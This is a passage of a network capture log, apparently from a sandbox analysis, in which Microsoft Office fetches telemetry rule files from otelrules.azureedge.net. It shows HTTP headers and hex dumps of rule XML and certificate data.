                                                        2024-11-28 12:35:26 UTC15824INData Raw: 4d 53 43 46 00 00 00 00 8d 2b 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 5b 49 00 00 14 00 00 00 00 00 10 00 8d 2b 00 00 a8 49 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 72 4d 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 fe f6 51 be 21 2b 72 4d 43 4b ed 7c 05 58 54 eb da f6 14 43 49 37 0a 02 d2 b9 86 0e 41 52 a4 1b 24 a5 bb 43 24 44 18 94 90 92 52 41 3a 05 09 95 ee 54 b0 00 91 2e e9 12 10 04 11 c9 6f 10 b7 a2 67 9f bd cf 3e ff b7 ff b3 bf 73 ed e1 9a 99 f5 c6 7a d7 bb de f5 3e cf fd 3c f7 dc 17 4a 1a 52 e7 41 a8 97 1e 14 f4 e5 25 7d f4 05 82 82 c1 20 30 08 06 ba c3 05 02 11 7f a9 c1 ff d2 87 5c 1e f4 ed 65 8e 7a 1f f6 0a 40 03 1d 7b f9 83 2c 1c 2f db b8 3a 39 3a 58 38 ba 73 5e
                                                        Data Ascii: MSCF+D[I+IdrMenvironment.cabQ!+rMCK|XTCI7AR$C$DRA:T.og>sz><JRA%} 0\ez@{,/:9:X8s^
                                                        2024-11-28 12:35:26 UTC14181INData Raw: 06 03 55 04 06 13 02 55 53 31 13 30 11 06 03 55 04 08 13 0a 57 61 73 68 69 6e 67 74 6f 6e 31 10 30 0e 06 03 55 04 07 13 07 52 65 64 6d 6f 6e 64 31 1e 30 1c 06 03 55 04 0a 13 15 4d 69 63 72 6f 73 6f 66 74 20 43 6f 72 70 6f 72 61 74 69 6f 6e 31 26 30 24 06 03 55 04 03 13 1d 4d 69 63 72 6f 73 6f 66 74 20 54 69 6d 65 2d 53 74 61 6d 70 20 50 43 41 20 32 30 31 30 30 1e 17 0d 32 33 31 30 31 32 31 39 30 37 32 35 5a 17 0d 32 35 30 31 31 30 31 39 30 37 32 35 5a 30 81 d2 31 0b 30 09 06 03 55 04 06 13 02 55 53 31 13 30 11 06 03 55 04 08 13 0a 57 61 73 68 69 6e 67 74 6f 6e 31 10 30 0e 06 03 55 04 07 13 07 52 65 64 6d 6f 6e 64 31 1e 30 1c 06 03 55 04 0a 13 15 4d 69 63 72 6f 73 6f 66 74 20 43 6f 72 70 6f 72 61 74 69 6f 6e 31 2d 30 2b 06 03 55 04 0b 13 24 4d 69 63 72 6f
                                                        Data Ascii: UUS10UWashington10URedmond10UMicrosoft Corporation1&0$UMicrosoft Time-Stamp PCA 20100231012190725Z250110190725Z010UUS10UWashington10URedmond10UMicrosoft Corporation1-0+U$Micro


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        32192.168.2.44984313.107.246.63443
                                                        TimestampBytes transferredDirectionData
                                                        2024-11-28 12:35:26 UTC195OUTGET /rules/other-Win32-v19.bundle HTTP/1.1
                                                        Connection: Keep-Alive
                                                        Accept-Encoding: gzip
                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                        Host: otelrules.azureedge.net
                                                        2024-11-28 12:35:26 UTC471INHTTP/1.1 200 OK
                                                        Date: Thu, 28 Nov 2024 12:35:26 GMT
                                                        Content-Type: text/plain
                                                        Content-Length: 218853
                                                        Connection: close
                                                        Vary: Accept-Encoding
                                                        Cache-Control: public
                                                        Last-Modified: Wed, 27 Nov 2024 15:11:14 GMT
                                                        ETag: "0x8DD0EF5BC53602D"
                                                        x-ms-request-id: a5a19dc6-401e-008c-1dff-4086c2000000
                                                        x-ms-version: 2018-03-28
                                                        x-azure-ref: 20241128T123526Z-174f7845968zgtf6hC1EWRqd8s0000000rcg00000000663r
                                                        x-fd-int-roxy-purgeid: 0
                                                        X-Cache: TCP_HIT
                                                        Accept-Ranges: bytes
                                                        2024-11-28 12:35:26 UTC15913INData Raw: 31 30 30 30 76 35 2b 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 30 30 30 22 20 56 3d 22 35 22 20 44 43 3d 22 45 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 52 75 6c 65 45 72 72 6f 72 73 41 67 67 72 65 67 61 74 65 64 22 20 41 54 54 3d 22 66 39 39 38 63 63 35 62 61 34 64 34 34 38 64 36 61 31 65 38 65 39 31 33 66 66 31 38 62 65 39 34 2d 64 64 31 32 32 65 30 61 2d 66 63 66 38 2d 34 64 63 35 2d 39 64 62 62 2d 36 61 66 61 63 35 33 32 35 31 38 33 2d 37 34 30 35 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 53 3d 22 37 30 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 50 53 50 20 50 53 55 22 20
                                                        Data Ascii: 1000v5+<?xml version="1.0" encoding="utf-8"?><R Id="1000" V="5" DC="ESM" EN="Office.Telemetry.RuleErrorsAggregated" ATT="f998cc5ba4d448d6a1e8e913ff18be94-dd122e0a-fcf8-4dc5-9dbb-6afac5325183-7405" SP="CriticalBusinessImpact" S="70" DL="A" DCa="PSP PSU"
                                                        2024-11-28 12:35:27 UTC16384INData Raw: 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 42 22 20 49 3d 22 35 22 20 4f 3d 22 66 61 6c 73 65 22 3e 0d 0a 20 20 20 20 3c 4f 20 54 3d 22 41 4e 44 22 3e 0d 0a 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 47 45 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 34 30 30 22 20 54 3d 22 49 33 32 22 20 2f 3e 0d 0a 20
                                                        Data Ascii: /> </R> </O> </R> </O> </C> <C T="B" I="5" O="false"> <O T="AND"> <L> <O T="GE"> <L> <S T="1" F="0" /> </L> <R> <V V="400" T="I32" />
                                                        2024-11-28 12:35:27 UTC16384INData Raw: 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 30 38 32 30 22 20 56 3d 22 33 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 4f 75 74 6c 6f 6f 6b 2e 44 65 73 6b 74 6f 70 2e 43 6f 6e 74 61 63 74 43 61 72 64 50 72 6f 70 65 72 74 69 65 73 43 6f 75 6e 74 73 22 20 41 54 54 3d 22 64 38 30 37 36 30 39 32 37 36 37 34 34 32 34 35 62 61 66 38 31 62 66 37 62 63 38 30 33 33 66 36 2d 32 32 36 38 65 33 37 34 2d 37 37 36 36 2d 34 39 37 36 2d 62 65 34 34 2d 62 36 61 64 35 62 64 64 63 35 62 36 2d 37 38 31 33 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 41 20 54 3d 22 31 22 20 45 3d 22 54 65 6c 65 6d 65 74 72 79 53 68 75 74 64 6f 77 6e 22 20 2f 3e 0d
                                                        Data Ascii: .0" encoding="utf-8"?><R Id="10820" V="3" DC="SM" EN="Office.Outlook.Desktop.ContactCardPropertiesCounts" ATT="d807609276744245baf81bf7bc8033f6-2268e374-7766-4976-be44-b6ad5bddc5b6-7813" DCa="PSU" xmlns=""> <S> <A T="1" E="TelemetryShutdown" />
                                                        2024-11-28 12:35:27 UTC16384INData Raw: 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 39 22 20 4f 3d 22 74 72 75 65 22 20 4e 3d 22 50 75 72 67 65 64 5f 41 67 65 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 34 22 20 46 3d 22 43 6f 75 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 30 22 20 4f 3d 22 74 72 75 65 22 20 4e 3d 22 50 75 72 67 65 64 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 35 22 20 46 3d 22 43 6f 75 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 31 22 20 4f 3d 22 74 72 75 65 22 20 4e 3d 22 46 69 6c 65 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 38 22 20 46 3d 22 43 6f 75 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20
                                                        Data Ascii: </C> <C T="U32" I="9" O="true" N="Purged_Age"> <S T="4" F="Count" /> </C> <C T="U32" I="10" O="true" N="Purged_Count"> <S T="5" F="Count" /> </C> <C T="U32" I="11" O="true" N="File_Count"> <S T="8" F="Count" /> </C>
                                                        2024-11-28 12:35:27 UTC16384INData Raw: 20 20 3c 53 20 54 3d 22 31 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 43 6f 75 6e 74 5f 43 72 65 61 74 65 43 61 72 64 5f 56 61 6c 69 64 4d 61 6e 61 67 65 72 5f 46 61 6c 73 65 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 32 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 43 6f 75 6e 74 5f 43 72 65 61 74 65 52 65 73 75 6c 74 5f 56 61 6c 69 64 50 65 72 73 6f 6e 61 5f 46 61 6c 73 65 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 32 22 20 2f 3e 0d 0a 20
                                                        Data Ascii: <S T="10" /> </C> </C> <C T="U32" I="1" O="false" N="Count_CreateCard_ValidManager_False"> <C> <S T="11" /> </C> </C> <C T="U32" I="2" O="false" N="Count_CreateResult_ValidPersona_False"> <C> <S T="12" />
                                                        2024-11-28 12:35:27 UTC16384INData Raw: 50 61 69 6e 74 5f 49 4d 73 6f 50 65 72 73 6f 6e 61 5f 57 61 73 4e 75 6c 6c 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 33 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 32 30 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 50 61 69 6e 74 5f 49 4d 73 6f 50 65 72 73 6f 6e 61 5f 4e 75 6c 6c 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 33 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 32 31 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 43 6c 65 61 6e 75 70 4d 73 6f 50 65 72 73 6f 6e 61 5f 49 4d 73 6f 50 65 72 73 6f 6e
                                                        Data Ascii: Paint_IMsoPersona_WasNull_Count"> <C> <S T="32" /> </C> </C> <C T="U32" I="20" O="false" N="Paint_IMsoPersona_Null_Count"> <C> <S T="33" /> </C> </C> <C T="U32" I="21" O="false" N="CleanupMsoPersona_IMsoPerson
                                                        2024-11-28 12:35:27 UTC16384INData Raw: 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 32 30 30 22 20 54 3d 22 49 36 34 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 4c 54 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 33 22 20 46 3d 22 52 65 74 72 69 65 76 61 6c 4d 69 6c 6c 69 73 65 63 6f 6e 64 73 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 34 30 30 22
                                                        Data Ascii: <R> <V V="200" T="I64" /> </R> </O> </L> <R> <O T="LT"> <L> <S T="3" F="RetrievalMilliseconds" /> </L> <R> <V V="400"
                                                        2024-11-28 12:35:27 UTC16384INData Raw: 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 30 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 4f 63 6f 6d 32 49 55 43 4f 66 66 69 63 65 49 6e 74 65 67 72 61 74 69 6f 6e 46 69 72 73 74 43 61 6c 6c 53 75 63 63 65 73 73 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 4f 63 6f 6d 32 49 55 43 4f 66 66 69 63 65 49 6e 74 65 67 72 61 74 69 6f 6e 46 69 72 73 74 43 61 6c 6c 46 61 69 6c 65 64 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43
                                                        Data Ascii: </S> <C T="U32" I="0" O="false" N="Ocom2IUCOfficeIntegrationFirstCallSuccessCount"> <C> <S T="9" /> </C> </C> <C T="U32" I="1" O="false" N="Ocom2IUCOfficeIntegrationFirstCallFailedCount"> <C> <S T="10" /> </C
                                                        2024-11-28 12:35:27 UTC16384INData Raw: 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 33 22 20 46 3d 22 54 65 6e 61 6e 74 20 65 6e 61 62 6c 65 64 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 33 22 20 46 3d 22 55 73 65 72 20 65 6e 61 62 6c 65 64 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 66 61 6c 73 65 22 20 54 3d 22 42 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 20 20 20
                                                        Data Ascii: L> <S T="3" F="Tenant enabled" /> </L> <R> <O T="EQ"> <L> <S T="3" F="User enabled" /> </L> <R> <V V="false" T="B" /> </R>
                                                        2024-11-28 12:35:27 UTC16384INData Raw: 75 73 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 34 30 34 22 20 54 3d 22 55 33 32 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 3c 2f 46 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 37 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 41 4e 44 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 47 45 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 32 22 20 46 3d 22 48 74 74 70 53 74 61 74 75 73 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20
                                                        Data Ascii: us" /> </L> <R> <V V="404" T="U32" /> </R> </O> </F> <F T="7"> <O T="AND"> <L> <O T="GE"> <L> <S T="2" F="HttpStatus" /> </L>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33192.168.2.44984413.107.246.63443
                                                        TimestampBytes transferredDirectionData
                                                        2024-11-28 12:35:29 UTC192OUTGET /rules/rule224902v2s19.xml HTTP/1.1
                                                        Connection: Keep-Alive
                                                        Accept-Encoding: gzip
                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                        Host: otelrules.azureedge.net
                                                        2024-11-28 12:35:29 UTC470INHTTP/1.1 200 OK
                                                        Date: Thu, 28 Nov 2024 12:35:29 GMT
                                                        Content-Type: text/xml
                                                        Content-Length: 450
                                                        Connection: close
                                                        Cache-Control: public, max-age=604800, immutable
                                                        Last-Modified: Tue, 09 Apr 2024 00:27:25 GMT
                                                        ETag: "0x8DC582BD4C869AE"
                                                        x-ms-request-id: 59158d4f-901e-00a0-5491-3f6a6d000000
                                                        x-ms-version: 2018-03-28
                                                        x-azure-ref: 20241128T123529Z-174f7845968glpgnhC1EWR7uec0000000ykg000000006w03
                                                        x-fd-int-roxy-purgeid: 0
                                                        X-Cache: TCP_HIT
                                                        Accept-Ranges: bytes
                                                        2024-11-28 12:35:29 UTC450INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 32 32 34 39 30 32 22 20 56 3d 22 32 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 31 30 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 55 54 53 20 54 3d 22 32 22 20 49 64 3d 22 62 62 72 35 71 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 53 20 54 3d 22 33 22 20 47 3d 22 7b 61 33 36 61 39 37 30 64 2d 34 35 61 39 2d 34 65 30 64 2d 39 63 61 62 2d 32 61 32 33 35 63 63 39 64 37 63 36 7d 22 20 2f 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 47 22 20 49 3d 22 30 22 20 4f 3d 22 66 61 6c 73 65 4e
                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="224902" V="2" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120100" /> <UTS T="2" Id="bbr5q" /> <SS T="3" G="{a36a970d-45a9-4e0d-9cab-2a235cc9d7c6}" /> </S> <C T="G" I="0" O="falseN


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        34192.168.2.44984713.107.246.63443
                                                        TimestampBytes transferredDirectionData
                                                        2024-11-28 12:35:29 UTC192OUTGET /rules/rule120100v3s19.xml HTTP/1.1
                                                        Connection: Keep-Alive
                                                        Accept-Encoding: gzip
                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                        Host: otelrules.azureedge.net
                                                        2024-11-28 12:35:29 UTC471INHTTP/1.1 200 OK
                                                        Date: Thu, 28 Nov 2024 12:35:29 GMT
                                                        Content-Type: text/xml
                                                        Content-Length: 1000
                                                        Connection: close
                                                        Cache-Control: public, max-age=604800, immutable
                                                        Last-Modified: Tue, 09 Apr 2024 00:26:24 GMT
                                                        ETag: "0x8DC582BB097AFC9"
                                                        x-ms-request-id: 6584919e-f01e-0003-06a3-3f4453000000
                                                        x-ms-version: 2018-03-28
                                                        x-azure-ref: 20241128T123529Z-174f7845968jrjrxhC1EWRmmrs0000000ym0000000004r8r
                                                        x-fd-int-roxy-purgeid: 0
                                                        X-Cache: TCP_HIT
                                                        Accept-Ranges: bytes
                                                        2024-11-28 12:35:29 UTC1000INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 31 30 30 22 20 56 3d 22 33 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 41 20 54 3d 22 31 22 20 45 3d 22 54 65 6c 65 6d 65 74 72 79 53 74 61 72 74 75 70 22 20 2f 3e 0d 0a 20 20 20 20 3c 41 20 54 3d 22 32 22 20 45 3d 22 54 65 6c 65 6d 65 74 72 79 52 65 73 75 6d 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 49 20 54 3d 22 33 22 20 49 3d 22 33 30 73 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 34 22 20 52 3d 22 31 32 30 31 30 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 35 22 3e
                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120100" V="3" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <A T="1" E="TelemetryStartup" /> <A T="2" E="TelemetryResume" /> <TI T="3" I="30s" /> <R T="4" R="120100" /> <TH T="5">


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        35192.168.2.44984613.107.246.63443
                                                        TimestampBytes transferredDirectionData
                                                        2024-11-28 12:35:29 UTC192OUTGET /rules/rule120600v4s19.xml HTTP/1.1
                                                        Connection: Keep-Alive
                                                        Accept-Encoding: gzip
                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                        Host: otelrules.azureedge.net
                                                        2024-11-28 12:35:30 UTC494INHTTP/1.1 200 OK
                                                        Date: Thu, 28 Nov 2024 12:35:29 GMT
                                                        Content-Type: text/xml
                                                        Content-Length: 2980
                                                        Connection: close
                                                        Vary: Accept-Encoding
                                                        Cache-Control: public, max-age=604800, immutable
                                                        Last-Modified: Tue, 09 Apr 2024 00:26:10 GMT
                                                        ETag: "0x8DC582BA80D96A1"
                                                        x-ms-request-id: 268d79c2-101e-008e-3860-41cf88000000
                                                        x-ms-version: 2018-03-28
                                                        x-azure-ref: 20241128T123529Z-174f7845968pf68xhC1EWRr4h80000000yn0000000008ec3
                                                        x-fd-int-roxy-purgeid: 0
                                                        X-Cache: TCP_HIT
                                                        Accept-Ranges: bytes
                                                        2024-11-28 12:35:30 UTC2980INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 30 22 20 56 3d 22 34 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 4d 65 74 61 64 61 74 61 44 65 76 69 63 65 43 6f 6e 73 6f 6c 69 64 61 74 65 64 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 44 43 22 20
                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120600" V="4" DC="SM" EN="Office.System.SystemHealthMetadataDeviceConsolidated" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalBusinessImpact" DL="A" DCa="DC"


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        36192.168.2.44984513.107.246.63443
                                                        TimestampBytes transferredDirectionData
                                                        2024-11-28 12:35:29 UTC193OUTGET /rules/rule120402v21s19.xml HTTP/1.1
                                                        Connection: Keep-Alive
                                                        Accept-Encoding: gzip
                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                        Host: otelrules.azureedge.net
                                                        2024-11-28 12:35:30 UTC494INHTTP/1.1 200 OK
                                                        Date: Thu, 28 Nov 2024 12:35:29 GMT
                                                        Content-Type: text/xml
                                                        Content-Length: 3788
                                                        Connection: close
                                                        Vary: Accept-Encoding
                                                        Cache-Control: public, max-age=604800, immutable
                                                        Last-Modified: Tue, 09 Apr 2024 00:26:17 GMT
                                                        ETag: "0x8DC582BAC2126A6"
                                                        x-ms-request-id: 0b3277ea-501e-00a0-5e91-3f9d9f000000
                                                        x-ms-version: 2018-03-28
                                                        x-azure-ref: 20241128T123529Z-174f7845968n2hr8hC1EWR9cag0000000y0g000000008b2z
                                                        x-fd-int-roxy-purgeid: 0
                                                        X-Cache: TCP_HIT
                                                        Accept-Ranges: bytes
                                                        2024-11-28 12:35:30 UTC3788INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 34 30 32 22 20 56 3d 22 32 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 55 6e 67 72 61 63 65 66 75 6c 41 70 70 45 78 69 74 44 65 73 6b 74 6f 70 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 43 65 6e 73 75 73 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 50 53 50 22 20 78 6d 6c 6e 73 3d 22 22
                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120402" V="21" DC="SM" EN="Office.System.SystemHealthUngracefulAppExitDesktop" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalCensus" DL="A" DCa="PSP" xmlns=""


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        37192.168.2.44984813.107.246.63443
                                                        TimestampBytes transferredDirectionData
                                                        2024-11-28 12:35:29 UTC192OUTGET /rules/rule120608v0s19.xml HTTP/1.1
                                                        Connection: Keep-Alive
                                                        Accept-Encoding: gzip
                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                        Host: otelrules.azureedge.net
                                                        2024-11-28 12:35:30 UTC494INHTTP/1.1 200 OK
